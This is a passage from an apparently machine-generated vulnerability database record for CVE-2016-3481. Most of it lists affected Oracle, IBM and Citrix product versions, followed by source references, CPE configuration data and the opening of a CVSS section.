version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, { db: "JVNDB", id: "JVNDB-2016-003869", }, { db: "CNNVD", id: "CNNVD-201607-678", }, { db: "NVD", id: "CVE-2016-3481", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003869", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91977", }, ], trust: 0.6, }, cve: "CVE-2016-3481", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
